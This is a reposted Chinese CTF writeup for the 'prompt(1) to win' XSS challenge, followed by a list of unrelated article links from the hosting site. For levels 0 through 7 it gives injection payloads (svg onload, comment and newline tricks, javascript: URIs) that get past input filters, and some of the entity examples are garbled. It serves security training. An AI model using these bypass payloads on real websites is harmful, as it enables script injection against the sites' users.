prompt(1) to win writeup
来源:互联网 发布:金马甲网络交易平台 编辑:程序博客网 时间:2024/05/22 19:57
转载自http://blog.csdn.net/sinat_25449961/article/details/69361520
0
没有任何过滤
"><script>prompt(1)</script>
或者 "><svg/onload=prompt(1)>
1
过滤了大于号>,采用注释符//绕过
aa<svg/onload=prompt(1)//
2
过滤了左括号(,使用<svg>
标签绕过。在SVG向量里面的<script>
元素(或者其他CDATA元素 ),会先进行xml解析。因此(
(十六进制)或者(
(十进制)或者(
(html实体编码)会被还原成(。
<svg><script>prompt(1)</script>
或者 <svg><script>prompt(1)<b>
或者
<script>eval.call`${'prompt\x281)'}`</script>
- 1
或者
<script>eval.call`${'prompt\x281)'}`</script>
- 1
3
过滤了-->
,可用--!>
代替
a--!><script>prompt(1)</script>
或者 --!><svg/onload=prompt(1)
4
5
过滤了onxxx,过滤了>,通过回车符号绕过onxxx过滤
aa" type=image src=x onerror
="prompt(1)
6
仔细看源码
javascript:prompt(1)#{"action":1}
7
使用“和=构造payload
"><svg/a=#"onload='/*#*/prompt(1)'
阅读全文
0 0
- prompt(1) to win writeup
- prompt(1) to win writeup
- prompt(1) to win -----XSS学习笔记
- xss练习-prompt(1) to win
- Born to Win (1)
- failed to execute prompt script (exit code 1)
- 【20171025早】alert(1) to win 练习
- wechall writeup:Programming 1
- prompt
- Prompt
- prompt()
- prompt
- prompt
- How to change your shell prompt.
- How to Customize your Terminal Prompt
- how to output quotes in bash prompt
- Born to Win
- CTF考核writeup(1)
- Java 方法参数
- 软件架构师的12项修炼——关系技能修炼(1)
- Shell命令行处理JSON
- sublime 命令行直接调用
- 查找之索引查找
- prompt(1) to win writeup
- 在C语言中为什么scanf输入语句,要在变量名前加&呢?
- 无法启动此程序,因为计算机中丢失MSVCRTD.dll(MFC42D.dll, MFCO42D.dll)
- Ubuntu16.04LTS+CUDA8.0+cuDNN5.1+Anaconda3(python3.6)+tensorflow_gpu-1.2.1安装过程全记录
- gradle 用户手册 第4章使用Gradle的命令行
- 获取wifi密码办法
- 测试测试一下
- Jenkins Git Maven搭建自动化部署项目环境 邮件通知
- mysql数据清洗备忘